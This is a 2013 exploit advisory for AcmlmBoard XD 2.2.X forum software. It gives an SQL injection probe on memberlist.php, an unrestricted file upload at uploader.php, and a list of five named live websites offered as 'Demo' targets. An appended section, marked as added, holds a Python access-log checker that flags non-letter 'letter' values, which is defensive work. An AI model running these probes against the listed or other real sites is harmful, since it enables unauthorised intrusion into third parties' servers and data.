AcmlmBoard XD 2.2.X SQL Injection/File Upload Vulnerabilities

Author: TUNISIAN CYBER, Published: 16-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: AcmlmBoard XD 2.2.X SQL Injection/File Upload Vulnerabilities
[+] Date: 16-12-2013
[+] Category: WebApp
[+] Vendor: https://github.com/ABXD/ABXD
[+] Google Dork: use your mind
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
Vulns:
I/ SQL injection:
127.0.0.1/[PATH]/memberlist.php?=[id]&letter='

II/ File Upload:
127.0.0.1/[PATH]/uploader.php (you have to register)

Demo:
http://www.ctconcerto.net/forum/uploader.php
http://www.brawlcustommusic.com/board/memberlist.php?=3&letter='
http://dannyb.byethost15.com/forum/memberlist.php?=3&letter='
http://helmet.kafuka.org/noxico/board/memberlist.php?=3&letter='
http://icg.uphero.com/board/memberlist.php?=3&letter='
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt, sec4ever
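
Added example, not part of the original advisory or the ABXD project: a log check that flags memberlist.php requests whose `letter` parameter is not a plain letter, as in the probe listed under I/. It assumes common-log-format access logs and that a legitimate `letter` value is a single ASCII letter; the sample log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Dec/2013:10:00:01 +0000] "GET /board/memberlist.php?letter=a HTTP/1.1" 200 5120
203.0.113.9 - - [16/Dec/2013:10:00:07 +0000] "GET /board/memberlist.php?=3&letter=' HTTP/1.1" 200 312
203.0.113.9 - - [16/Dec/2013:10:00:09 +0000] "GET /board/memberlist.php?=3&letter=%27 HTTP/1.1" 200 312
203.0.113.7 - - [16/Dec/2013:10:01:30 +0000] "GET /board/memberlist.php HTTP/1.1" 200 8040
203.0.113.9 - - [16/Dec/2013:10:02:00 +0000] "GET /board/index.php?letter=' HTTP/1.1" 200 900
"""

# Captures the client address and the request target of one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate member-list filter is exactly one ASCII letter.
VALID_LETTER = re.compile(r"[A-Za-z]")


def suspicious_memberlist_requests(log_text):
    """Return (client, decoded letter value) for out-of-policy requests."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/memberlist.php"):
            continue  # only the endpoint named in the advisory
        # parse_qs percent-decodes values, so letter=%27 and letter=' are
        # compared in the same form; an absent or empty letter is dropped
        # by parse_qs and therefore not flagged.
        params = parse_qs(url.query)
        for value in params.get("letter", []):
            if not VALID_LETTER.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_memberlist_requests(SAMPLE_LOG):
        print(f"{client} sent letter={value!r} to memberlist.php")
```

The same allowlist (one ASCII letter, everything else rejected) is the input check to enforce server-side before the value reaches a query.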